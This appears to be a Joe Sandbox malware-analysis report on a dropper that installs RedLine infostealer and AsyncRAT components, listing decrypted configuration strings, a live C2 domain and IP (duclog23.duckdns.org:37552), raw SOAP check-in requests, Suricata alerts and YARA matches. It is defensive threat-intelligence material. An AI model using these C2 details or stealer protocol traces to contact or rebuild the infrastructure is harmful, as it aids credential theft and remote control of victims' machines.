                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: <123456789>
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: <Xwormmm>
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: Metin
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: USB.exe
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: %AppData%
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: Chrome.exe
                        Source: f5ATZ1i5CU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: Binary string: xHPloHC:\Windows\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb|kt source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbC source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2569540442.0000000005E5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbe source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @xo.pdbService source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3v source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000760000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb| source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49740 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49777 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49704 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49813 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49849 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49885 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49923 -> 192.169.69.26:37552
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49960 -> 192.169.69.26:37552
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: duclog23.duckdns.org
                        Source: Malware configuration extractorURLs: duclog23.duckdns.org:37552
                        Uses dynamic DNS services
                        Source: unknownDNS query: name: duclog23.duckdns.org
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 37552
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                        Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                        Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: duclog23.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: powershell.exe, 00000011.00000002.1610201405.0000022EB86D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m2
                        Source: powershell.exe, 00000011.00000002.1611877775.0000022EB877B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m9
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://duclog23.duckdns.org
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://duclog23.duckdns.org:37552
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://duclog23.duckdns.org:37552/
                        Source: Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Metin.exe.1.dr, Chrome.exe.9.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000E.00000002.1471926630.00000251699EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000002.00000002.1314444524.00000000034AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co$
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cos
                        Source: powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.drString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0361B5702_2_0361B570
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0361F6352_2_0361F635
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0361F6BD2_2_0361F6BD
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0361B5502_2_0361B550
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE3E982_2_08EE3E98
                        Source: C:\Users\user\AppData\Roaming\M2.exeCode function: 6_2_024CE7B06_2_024CE7B0
                        Source: C:\Users\user\AppData\Roaming\M2.exeCode function: 6_2_024CDC906_2_024CDC90
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C14116A99_2_00007FF7C14116A9
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C14122C19_2_00007FF7C14122C1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C1419DE19_2_00007FF7C1419DE1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C1416DA29_2_00007FF7C1416DA2
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C1415FF69_2_00007FF7C1415FF6
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C14112E89_2_00007FF7C14112E8
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C14120299_2_00007FF7C1412029
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C1419DE19_2_00007FF7C1419DE1
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 27_2_00007FF7C14416A927_2_00007FF7C14416A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 27_2_00007FF7C144202927_2_00007FF7C1442029
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 30_2_00007FF7C14216A930_2_00007FF7C14216A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 30_2_00007FF7C142202930_2_00007FF7C1422029
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 31_2_00007FF7C14216A931_2_00007FF7C14216A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeCode function: 31_2_00007FF7C142202931_2_00007FF7C1422029
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Chrome.exe 08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\M2.exe 00A709BACA231F15267526D7B5DB11CD94B0089ED6CFD1667A1FF2EBD584C266
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs f5ATZ1i5CU.exe
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMetin.exe4 vs f5ATZ1i5CU.exe
                        Source: f5ATZ1i5CU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
